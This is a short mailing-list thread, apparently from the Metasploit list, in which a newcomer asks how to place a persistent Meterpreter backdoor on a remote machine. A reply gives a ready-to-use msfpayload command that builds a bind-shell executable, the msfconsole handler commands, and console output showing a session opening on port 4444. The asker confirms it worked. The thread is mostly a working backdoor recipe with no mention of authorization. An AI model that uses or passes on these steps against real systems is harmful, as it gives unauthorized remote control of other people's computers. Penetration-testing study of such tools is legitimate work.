Place a Meterpreter backdoor

[bardo at mclink.it (BardoBaggins)]

Thanks!
That was EXACTLY what I wanted to know :)
tried out adn worked perfectly... except for a little issue. If I try to 
NMAP (SYN Scan) the 4444 port on the remote host to check if it's open, 
the backdoor process crashes. This happened on a WinXP SP2 Italian.

Bye !

Bardo


Ramakrishna Nyayapathi wrote:
> Yes there is. In the framework directory,
>
> ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 EXITFUNC=thread X 
> > met_bkdoor.exe
>
> Executing this file on the target machine should set up a meterpreter  
> backdoor on 4444.
>
> in msfconsole,
>
> msf > use multi/handler
> msf exploit(handler) > set PAYLOAD  windows/meterpreter/bind_tcp
> PAYLOAD => windows/meterpreter/bind_tcp
> msf exploit(handler) > set RHOST 1.2.3.4 <http://1.2.3.4>
> RHOST => 1.2.3.4 <http://1.2.3.4>
> msf exploit(handler) > exploit
> [*] Started bind handler
> [*] Starting the payload handler...
> [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
> [*] Sending stage (2834 bytes)
> [*] Sleeping before handling stage...
> [*] Uploading DLL (81931 bytes)...
> [*] Upload completed.
> [*] Meterpreter session 1 opened (1.2.3.3:1376 <http://1.2.3.3:1376> 
> -> 1.2.3.4:4444 <http://1.2.3.4:4444>)
>
> meterpreter >
>
> Hope that helps..
>
>
> On 5/10/07, *BardoBaggins* < bardo at mclink.it <mailto:bardo at mclink.it>> 
> wrote:
>
>     Hello !
>
>     First, I would like to apologize if my question is kinda "dumb".
>     I'm a
>     newbie in the field and I'm ever longing for new knowledge.
>
>     Anyway, the question is : Is it possible to place a permanent
>     meterpreter process running on a remote machine acting as a backdoor ?
>
>     Tnx. Bye !!
>
>     Bardo

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070511/3813a743/attachment.htm>